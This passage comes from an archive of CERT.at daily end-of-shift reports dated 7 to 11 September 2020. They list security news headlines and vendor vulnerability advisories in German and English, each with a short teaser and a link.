∗∗∗ --------------------------------------------- Eine kritische Lücke im Betriebssystem PAN-OS gefährdet Firewalls aus dem Hause Palo Alto. --------------------------------------------- https://heise.de/-4892796 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (thunderbird), Debian (libproxy, qemu, and wordpress), Fedora (ansible, chromium, community-mysql, dotnet-build-reference-packages, dotnet3.1, drupal7, grub2, java-1.8.0-openjdk-aarch32, kernel, kernel-headers, kernel-tools, mingw-gnutls, php-symfony4, python-django, and selinux-policy), Gentoo (DBI, file-roller, gnome-shell, gst-rtsp-server, nextcloud-client, php, proftpd, qtgui, and zeromq), openSUSE (gimp, libjpeg-turbo, openldap2, [...] --------------------------------------------- https://lwn.net/Articles/831524/ ∗∗∗ Vulnerabilities Expose Thousands of MobileIron Servers to Remote Attacks ∗∗∗ --------------------------------------------- Researchers have disclosed the details of several potentially serious vulnerabilities affecting MobileIron’s mobile device management (MDM) solutions, including a flaw that can be exploited by an unauthenticated attacker for remote code execution on affected servers. --------------------------------------------- https://www.securityweek.com/vulnerabilities-expose-thousands-mobileiron-se… ∗∗∗ Multiple vulnerabilities in Buffalo AirStation WHR-G54S ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN09166495/ ∗∗∗ Security Bulletin: IBM Cloud Pak System is affected by a vulnerability in VMware component ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-system-is-a… ∗∗∗ Security Bulletin: A vulnerability in Apache AvtiveMQ affects IBM Operations Analytics Predictive Insights (CVE-2020-1941) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-apache… ∗∗∗ Security Bulletin: Vulnerability in libcurl affects the OS image for RedHat Enterprise Linux for IBM Cloud Pak System (CVE-2019-5436) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-libcurl-… ∗∗∗ Security Bulletin: Vulnerability in OpenSSL library affects OS Pattern Kit used in IBM Cloud Pak System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-… ∗∗∗ Security Bulletin: IBM Kenexa LMS On Premise -IBM SDK, Java Technology Edition Quarterly CPU -Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lms-on-premise… ∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – [All] jQuery (Publicly disclosed vulnerability) CVEID: 180875 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o… ∗∗∗ Security Bulletin: Vulnerability in side channel in Intel CPUs affect IBM Cloud Pak System (CVE-2019-11135) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-side-cha… ∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – [All] jQuery (Publicly disclosed vulnerability) CVE-2020-11023, CVE-2020-11022 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK addressed in IBM Cloud Pak System (April 2020 updates) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.09.2020
by Daily end-of-shift report 11 Sep '20

11 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 10-09-2020 18:00 − Freitag 11-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Zoom adds two-factor authentication (2FA) support to all accounts ∗∗∗ --------------------------------------------- Zoom has announced that starting today it has added two-factor authentication (2FA) support to all user accounts to make it simpler to secure them against security breaches and identity theft. --------------------------------------------- https://www.bleepingcomputer.com/news/security/zoom-adds-two-factor-authent… ∗∗∗ Whats in Your Clipboard? Pillaging and Protecting the Clipboard, (Fri, Sep 11th) ∗∗∗ --------------------------------------------- Recently I happened to notice that the Cisco AnyConnect VPN client clears the clipboard if you paste a password into it. (Note - if you know and can type any of your passwords in 2020, you should at least partially examine your life choices). Several password managers also do this "right thing" - retaining passwords in the clipboard is a great way for folks to accidentally paste that information into the worst [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26556 ∗∗∗ WordPress Malware Disables Security Plugins to Avoid Detection ∗∗∗ --------------------------------------------- An alarm or monitoring system is a great tool that can be used to improve the security of a home or website, but what if an attacker can easily disable it? --------------------------------------------- https://blog.sucuri.net/2020/09/wordpress-malware-disables-security-to-avoi… ∗∗∗ Bluetooth anfällig für Angriffe auf Schlüssel – irgendwie ∗∗∗ --------------------------------------------- Das CERT/CC und die Bluetooth-Standardisierer warnen vor Blurtooth – knausern aber mit Informationen zur entdeckten Schwachstelle. --------------------------------------------- https://heise.de/-4891764 ∗∗∗ Sichere Passwörter schützen vor Verlust und Missbrauch ∗∗∗ --------------------------------------------- Sichere Passwörter schützen nicht nur private Informationen vor Fremden. Sie schützen vor allem vor finanziellem Schaden und Identitätsmissbrauch. Daher ist auf die Passwort-Sicherheit besonderen Wert zu legen. --------------------------------------------- https://www.watchlist-internet.at/news/sichere-passwoerter-schuetzen-vor-ve… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (python-pip), Fedora (kernel, libX11, and xen), openSUSE (go1.14), Oracle (libcroco, php:7.3, and postgresql:10), Red Hat (chromium-browser and httpd:2.4), and SUSE (gimp, golang-github-prometheus-prometheus, kernel, libxml2, pdsh, slurm_20_02, slurm, slurm_18_08, and tomcat). --------------------------------------------- https://lwn.net/Articles/831283/ ∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affects Host On-Demand ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: A vulnerability may affect IBM® SDK, Java™ Technology Edition used in Liberty for Java for IBM Cloud (CVE-2020-2590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-may-affec… ∗∗∗ Security Bulletin: IBM® Db2® on AIX and Linux Affected by a Vulnerability in IBM® Spectrum Scale (CVE-2020-4411) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-on-aix-and-linux-… ∗∗∗ Security Bulletin: IBM® SDK, Java™ Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability affects Liberty for Java for IBM Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: IBM® Db2® on AIX and Linux Affected by a Vulnerability in IBM® Spectrum Scale (CVE-2020-4412) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-on-aix-and-linux-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK and IBM Java Runtime related to the Kerberos component affect IBM® Db2®. (CVE-2019-2949) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: A vulnerability may affect IBM® SDK, Java™ Technology Edition used in Liberty for Java for IBM Cloud (CVE-2020-2601) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-may-affec… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.09.2020
by Daily end-of-shift report 10 Sep '20

10 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 09-09-2020 18:00 − Donnerstag 10-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ ProLock ransomware increases payment demand and victim count ∗∗∗ --------------------------------------------- Using standard tactics, the operators of ProLock ransomware were able to deploy a large number of attacks over the past six months, averaging close to one target every day. --------------------------------------------- https://www.bleepingcomputer.com/news/security/prolock-ransomware-increases… ∗∗∗ An overview of targeted attacks and APTs on Linux ∗∗∗ --------------------------------------------- Perhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there’s a widely held opinion that Linux [...] --------------------------------------------- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98… ∗∗∗ Zeppelin Ransomware Returns with New Trojan on Board ∗∗∗ --------------------------------------------- The malware has popped up in a targeted campaign and a new infection routine. --------------------------------------------- https://threatpost.com/zeppelin-ransomware-returns-trojan/159092/ ∗∗∗ O365 Phishing Attack Used Real-Time Validation against Active Directory ∗∗∗ --------------------------------------------- A phishing attack used real-time validation against an organization’s Active Directory in order to steal users’ Office 365 credentials. According to Armorblox, the phishing attack targeted an executive working at an American brand that was named one of the world’s Top 50 most innovative companies for 2019 on a Friday evening. The email used spoofing [...] --------------------------------------------- https://www.tripwire.com/state-of-security/security-data-protection/o365-ph… ∗∗∗ BLURtooth Vulnerability Can Allow Bluetooth MITM Attacks ∗∗∗ --------------------------------------------- A security vulnerability in the Cross-Transport Key Derivation (CTKD) of devices supporting both Bluetooth BR/EDR and LE could allow an attacker to overwrite encryption keys, researchers have discovered. --------------------------------------------- https://www.securityweek.com/blurtooth-vulnerability-can-allow-bluetooth-mi… ∗∗∗ Fake Gewinnspiel mit Cineplexx-Gutschein lockt in Abo-Falle ∗∗∗ --------------------------------------------- Auf Facebook wird über Anzeigen und den Facebook-Messenger ein Gewinnspiel beworben. Sie wurden angeblich, ausgewählt Gutscheine für Cineplexx-Kinos zu erhalten. Dafür sollen Sie 2 Euro für die Versandkosten mit Ihrer Kreditkarte bezahlen. Achtung: Das Gewinnspiel ist fake, die Gutscheine gibt es nicht und Sie landen in einer Abo-Falle! Cineplexx selbst hat nichts mit diesen Gewinnspielen zu tun. --------------------------------------------- https://www.watchlist-internet.at/news/fake-gewinnspiel-mit-cineplexx-gutsc… ∗∗∗ New CDRThief malware targets VoIP softswitches to steal call detail records ∗∗∗ --------------------------------------------- Malware targets only two very specific softswitches (software switches): Linknat VOS2009 and VOS3000. --------------------------------------------- https://www.zdnet.com/article/new-cdrthief-malware-targets-voip-softswitche… ∗∗∗ Ransomware-Attacken vervielfacht ∗∗∗ --------------------------------------------- Die Zahl der Ransomware-Angriffe ist im ersten Halbjahr im Vergleich zum Vorjahr um 715% gestiegen. Die Lösegelderpresser werden immer gefährlicher und sorgen für hohe Schäden. --------------------------------------------- https://www.zdnet.de/88382645/ransomware-attacken-vervielfacht/ ∗∗∗ Recent Dridex activity, (Thu, Sep 10th) ∗∗∗ --------------------------------------------- For the past month or so, I hadn't had any luck finding active malspam campaigns pushing Dridex malware. That changed starting this week, and I've since found several examples. Today's diary reviews an infection from Wednesday September 9th, 2020. --------------------------------------------- https://isc.sans.edu/diary/rss/26550 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (ark, gnupg, go, opendmarc, and python-django), Debian (libxml2), Gentoo (chromium), Oracle (librepo and thunderbird), Red Hat (dovecot and httpd:2.4), SUSE (avahi, kernel, and openldap2), and Ubuntu (xorg-server). --------------------------------------------- https://lwn.net/Articles/831178/ ∗∗∗ Palo Alto Networks Patches Serious DoS, Code Execution Flaws in PAN-OS ∗∗∗ --------------------------------------------- Palo Alto Networks this week announced that it has patched critical and high-severity denial-of-service (DoS) and arbitrary code execution vulnerabilities in its PAN-OS firewall software. read more --------------------------------------------- https://www.securityweek.com/palo-alto-networks-patches-serious-dos-code-ex… ∗∗∗ PEPPERL+FUCHS/VMT Bildverarbeitungssysteme GmbH: VMT MSS and VMT IS - Several vulnerabilities in products utilizing WIBU SYSTEMS CodeMeter components ∗∗∗ --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-034 ∗∗∗ PILZ: Multiple products prone to WIBU CodeMeter vulnerabilities ∗∗∗ --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-033 ∗∗∗ avahi: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0892 ∗∗∗ Ruby on Rails: Schwachstelle ermöglicht Cross-Site Scripting ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0891 ∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in jackson-databind shipped with IBM Cloud Pak System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-jackson-… ∗∗∗ Security Bulletin: WebSphere Application Server Admin Console is vulnerable to cross-site scripting (CVE-2020-4578) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: Vulnerabilities in IBM HTTP Server affects IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ht… ∗∗∗ Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM i ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affect IBM Cloud Orchestrator (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.09.2020
by Daily end-of-shift report 09 Sep '20

09 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 08-09-2020 18:00 − Mittwoch 09-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Hackers use legit tool to take over Docker, Kubernetes platforms ∗∗∗ --------------------------------------------- In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-use-legit-tool-to-ta… ∗∗∗ Diffie-Hellman-Seitenkanal: Raccoon-Angriff auf TLS betrifft nur Wenige ∗∗∗ --------------------------------------------- Forscher zeigen eine bislang unbekannte Schwäche im TLS-Protokoll, die praktischen Risiken sind aber sehr gering. --------------------------------------------- https://www.golem.de/news/diffie-hellman-seitenkanal-raccoon-angriff-auf-tl… ∗∗∗ Attacking the Qualcomm Adreno GPU ∗∗∗ --------------------------------------------- When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access. This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU) --------------------------------------------- https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gp… ∗∗∗ Adobe behebt Schwachstellen ∗∗∗ --------------------------------------------- Adobes neueste Runde von Sicherheitsupdates behebt schwerwiegende Fehler in Experience Manager, InDesign und Framemaker. Der Grafikspezialist verabschiedet sich zudem von Flash. --------------------------------------------- https://www.zdnet.de/88382613/adobe-behebt-schwachstellen/ ===================== = Vulnerabilities = ===================== ∗∗∗ Patchday: Von Angreifern präparierte Websites könnten Windows gefährlich werden ∗∗∗ --------------------------------------------- Microsoft hat Sicherheitsupdates für mehrere Produkte veröffentlicht und über 120 Sicherheitslücken geschlossen. --------------------------------------------- https://heise.de/-4888876 ∗∗∗ IPAS: Security Advisories for September 2020 ∗∗∗ --------------------------------------------- Hi everyone, Today we are releasing four security advisories addressing 9 vulnerabilities that were all internally found by Intel except for INTEL-SA-00405 which was reported through our bug bounty program. --------------------------------------------- https://blogs.intel.com/technology/2020/09/intel-september-2020-security-ad… ∗∗∗ Google Android: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Google Android ausnutzen, um Schadcode auszuführen, um seine Privilegien zu erhöhen, um Informationen auszuspähen und um Sicherheitsmechanismen zu umgehen. Letztlich kann der Angreifer so die Kontrolle über das Gerät übernehmen. Zur Ausnutzung genügt es, eine bösartige App zu installieren bzw. zu nutzen. --------------------------------------------- https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/09/warn… ∗∗∗ Reflected XSS in WordPress Plugin Admin Pages ∗∗∗ --------------------------------------------- The administrative dashboard in WordPress is a pretty safe place: Only elevated users can access it. Exploiting a plugin’s admin panel would serve very little purpose here — an administrator already has the required permissions to do all of the actions a vulnerability could cause. While this is usually true, there are a number of techniques bad actors are using to trick an administrator into performing actions they would not expect, such as Cross Site Request Forgery (CSRF) or [...] --------------------------------------------- https://blog.sucuri.net/2020/09/reflected-xss-in-wordpress-plugin-admin-pag… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (grunt), Fedora (ansible and geary), openSUSE (firefox, gettext-runtime, python-Flask-Cors, and thunderbird), Oracle (firefox and thunderbird), Red Hat (.NET Core 3.1), SUSE (kernel and libjpeg-turbo), and Ubuntu (gnutls28 and libx11). --------------------------------------------- https://lwn.net/Articles/831069/ ∗∗∗ PHOENIX CONTACT: Products utilizing WIBU SYSTEMS CodeMeter components ∗∗∗ --------------------------------------------- Several vulnerabilities have been discovered in WIBU SYSTEMS CodeMeter Runtime. --------------------------------------------- https://cert.vde.com/de-de/advisories/copy_of_vde-2020-030 ∗∗∗ WAGO: Vulnerable WIBU-SYSTEMS Codemeter installed through e!COCKPIT ∗∗∗ --------------------------------------------- Multiple vulnerabilties were reported in WIBU-SYSTEMS Codemeter. --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-032 ∗∗∗ Security Advisory - Privilege Elevation Vulnerability in Microsoft Windows Kerberos Key Distribution Center ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20200909-… ∗∗∗ Security Advisory - Buffer Overflow Vulnerability on Several Mobile Broadband Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-… ∗∗∗ Security Advisory - MITM Vulnerability on Huawei Share ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200909-… ∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting and server-side request forgery. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities Affect IBM WebSphere Application Server in IBM Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.09.2020
by Daily end-of-shift report 08 Sep '20

08 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Montag 07-09-2020 18:00 − Dienstag 08-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Windows 10 themes can be abused to steal Windows accounts ∗∗∗ --------------------------------------------- Specially crafted Windows 10 themes and theme packs can be used in Pass-the-Hash attacks to steal Windows account credentials from unsuspecting users. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-ab… ∗∗∗ Office: About OLE and ZIP Files, (Mon, Sep 7th) ∗∗∗ --------------------------------------------- A reader asked if a particular Emotet sample was a malformed ZIP file. It is not, and I will explain why you might think it is in this diary entry. --------------------------------------------- https://isc.sans.edu/diary/rss/26540 ∗∗∗ Japan, France, New Zealand Warn of Sudden Uptick in Emotet Trojan Attacks ∗∗∗ --------------------------------------------- Cybersecurity agencies across Asia and Europe have issued multiple security alerts regarding the resurgence of email-based Emotet malware attacks targeting businesses in France, Japan, and New Zealand. --------------------------------------------- https://thehackernews.com/2020/09/emotet-malware-attack.html ∗∗∗ Was sind Tech-Support Scams? Und: Wie Sie sich davor schützen! ∗∗∗ --------------------------------------------- Ein Tech-Support Scam ist eine Betrugsmasche, wo sich Kriminelle als Service-MitarbeiterInnen von Microsoft oder Apple ausgeben und ein Computerproblem vortäuschen. Die Kontaktaufnahme erfolgt entweder durch die Kriminellen per Telefon oder die Opfer rufen aufgrund eines Pop-Ups selbst bei einer vermeintlichen Service-Stelle an. In beiden Fällen wird eine Fernwartungssoftware installiert, um Zugangsdaten zu erspähen, Schadsoftware zu installieren oder Daten zu löschen oder [...] --------------------------------------------- https://www.watchlist-internet.at/news/was-sind-tech-support-scams-und-wie-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe InDesign (APSB20-52), Adobe Framemaker (APSB20-54) and Adobe Experience Manager (APSB20-56). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1916 ∗∗∗ Windows 10 Sandbox activation enables zero-day vulnerability ∗∗∗ --------------------------------------------- A reverse engineer discovered a new zero-day vulnerability in most Windows 10 editions that allows creating files in restricted areas of the operating system. --------------------------------------------- https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activatio… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (imagemagick, lemonldap-ng, and zeromq3), Fedora (ark, cryptsetup, gnutls, kernel, kernel-headers, and kernel-tools), openSUSE (firefox, kernel, and thunderbird), Red Hat (cloud-init, go-toolset:rhel8, libcroco, librepo, php:7.3, postgresql:10, and thunderbird), SUSE (firefox and go1.14), and Ubuntu (linux, linux-aws, linux-aws-5.3, linux-aws-5.4, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-azure-5.4, linux-gcp, linux-gcp-4.15, linux-gcp-5.4, [...] --------------------------------------------- https://lwn.net/Articles/830941/ ∗∗∗ SAP Patchday September 2020 ∗∗∗ --------------------------------------------- Ein entfernter, authentisierter oder anonymer Angreifer kann mehrere Schwachstellen in SAP Produkten und Anwendungskomponenten ausnutzen, um die Vertraulichkeit, Verfügbarkeit und die Integrität der Anwendungen zu gefährden. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0870 ∗∗∗ Citrix StoreFront Security Update ∗∗∗ --------------------------------------------- An issue has been discovered in Citrix StoreFront that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server. --------------------------------------------- https://support.citrix.com/article/CTX277455 ∗∗∗ SSA-770698: User Information Disclosure Vulnerability in Siveillance Video Client ∗∗∗ --------------------------------------------- The Siveillance Video Client contains an information disclosure vulnerability that could allow an attacker to obtain valid adminstrator login names and use this information to launch further attacks. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-770698.txt ∗∗∗ SSA-709003: Privilege Escalation Vulnerability in License Management Utility (LMU) ∗∗∗ --------------------------------------------- The latest update for the License Management Utility (LMU), which is used by multiple Siemens building technology products, fixes a vulnerability that could allow local users to escalate privileges and execute code as local SYSTEM user. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-709003.txt ∗∗∗ SSA-568969: Insecure Storage of Sensitive Information in Spectrum Power™ 4 ∗∗∗ --------------------------------------------- Vulnerabilities in Spectrum Power™ 4 could allow an unauthorized attacker to retrieve a list of software users, or in certain cases to list the contents of a directory. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-568969.txt ∗∗∗ SSA-542525: Authentication Vulnerabilities in SIMATIC HMI Products ∗∗∗ --------------------------------------------- SIMATIC HMI Products are affected by two vulnerabilities that could allow a remote attacker to discover user passwords and obtain access to the Sm@rt Server via a brute-force attack. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-542525.txt ∗∗∗ SSA-534763: Special Register Buffer Data Sampling (SRBDS) aka Crosstalk in Industrial Products ∗∗∗ --------------------------------------------- Security researchers published information on a vulnerability known as Crosstalk (INTEL-SA-00320). This vulnerability affects modern Intel processors to a varying degree. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-534763.txt ∗∗∗ SSA-455843: WIBU Systems CodeMeter Runtime Vulnerabilities in Siemens and Siemens Energy Products ∗∗∗ --------------------------------------------- CISA and WIBU Systems disclosed six vulnerabilities in different versions of CodeMeter Runtime, a product provided by WIBU Systems and used in several Siemens and Siemens Energy products for license management. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-455843.txt ∗∗∗ SSA-436520: XSS and CSRF Vulnerabilities in Polarion Subversion Webclient ∗∗∗ --------------------------------------------- Multiple cross-site scripting (XSS) vulnerabilities were found in the subversion webclient of Polarion. In addition, the webclient doesnt have any cross-site request forgery (CSRF) protection. An attacker could inject client side script to induce the victim to issue an HTTP request that would lead to a state changing operation. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-436520.txt ∗∗∗ SSA-381684: Improper Password Protection during Authentication in SIMATIC S7-300 and S7-400 CPUs ∗∗∗ --------------------------------------------- A vulnerability has been identified in SIMATIC S7-300 and S7-400 CPU families, which could result in credential disclosure. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-381684.txt ∗∗∗ SSA-251935: Multiple Privilege Escalation Vulnerabilities in SIMATIC RTLS Locating Manager ∗∗∗ --------------------------------------------- The latest update for SIMATIC RTLS Locating Manager fixes various vulnerabilities that could allow a low-privileged local user to escalate privileges. --------------------------------------------- https://cert-portal.siemens.com/productcert/txt/ssa-251935.txt ∗∗∗ Red Hat Enterprise Linux: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0871 ∗∗∗ Security Bulletin: Novalink is impacted by denial of service high vulnerability in WebSphere Application Server Liberty CVE-2019-4720 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-d… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – July 2020 – Includes Oracle July 2020 CPU affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affecting Tivoli Netcool/OMNIbus (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Security Bulletin: Novalink is impacted by Publicly disclosed vulnerability in IBM Java SDK/JRE (CVE-2019-4732) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-bulletin-novalin… ∗∗∗ Security Bulletin: Novalink is impacted Apache CXF affects middle vulnerability in WebSphere Application Server Liberty (CVE-2019-12406) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-apac… ∗∗∗ Security Bulletin: Novalink is impacted by Apache CXF affects WebSphere Liberty JAX-WS middle vulnerability in WebSphere Application Server Liberty (CVE-2019-17573) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-a… ∗∗∗ Security Bulletin: Vulnerability in Apache Ant affects IBM Platform Symphony and IBM Spectrum Symphony ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-a… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.09.2020
by Daily end-of-shift report 07 Sep '20

07 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 04-09-2020 18:00 − Montag 07-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Visa warns of new Baka credit card JavaScript skimmer ∗∗∗ --------------------------------------------- Visa issued a warning regarding a new JavaScript e-commerce skimmer known as Baka that will remove itself from memory after exfiltrating stolen data and analysis. --------------------------------------------- https://www.bleepingcomputer.com/news/security/visa-warns-of-new-baka-credi… ∗∗∗ Threema E2EE chat app to go fully open source within months ∗∗∗ --------------------------------------------- Threema follows in the footsteps of Signal and Wickr and opens its apps codebase. --------------------------------------------- https://www.zdnet.com/article/threema-e2ee-chat-app-to-go-fully-open-source… ∗∗∗ Manipulierte Excel-Dateien in Phishing-Mails ∗∗∗ --------------------------------------------- Eine neu entdeckte Malware-Bande benutzt einen cleveren Trick, um bösartige Excel-Dateien zu erstellen, die eine höhere 